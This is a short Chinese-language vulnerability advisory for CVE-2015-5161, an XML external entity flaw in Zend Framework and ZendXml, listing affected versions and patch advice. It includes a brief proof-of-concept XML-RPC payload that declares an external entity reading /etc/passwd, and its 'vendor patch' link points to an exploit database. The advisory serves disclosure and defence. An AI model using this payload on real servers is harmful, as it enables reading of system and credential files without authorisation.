多个Zend产品XML外部实体注入漏洞(CVE-2015-5161)
发布日期:2015-08-03
更新日期:2015-08-26
受影响系统:
Zend Zend Framework < 2.4.6
Zend Zend Framework < 1.12.14
Zend ZendXml < 1.0.1
描述:
BUGTRAQ ID: 76177
CVE(CAN) ID: CVE-2015-5161
Zend Framework (ZF) 是一个开放源代码的 PHP5 开发框架,可用于来开发 web 程序和服务。
ZendXml及Zend Framework某些版本的Zend_Xml_Security::scan,当在线程环境中的PHP-FPM下运行时,会使远程攻击者通过多字节编码的字符,利用此漏洞绕过安全检查、执行XXE及XEE攻击。
<*来源:Dawid Golunski
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<?xml version="1.0" encoding="UTF-8"?>
< !DOCTYPE methodCall [
<!ENTITY pocdata SYSTEM "file:///etc/passwd">
]>
< methodCall>
<methodName>retrieved: &pocdata;</methodName>
< /methodCall>
建议:
厂商补丁:
Zend
----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
https://www.exploit-db.com/exploits/37765/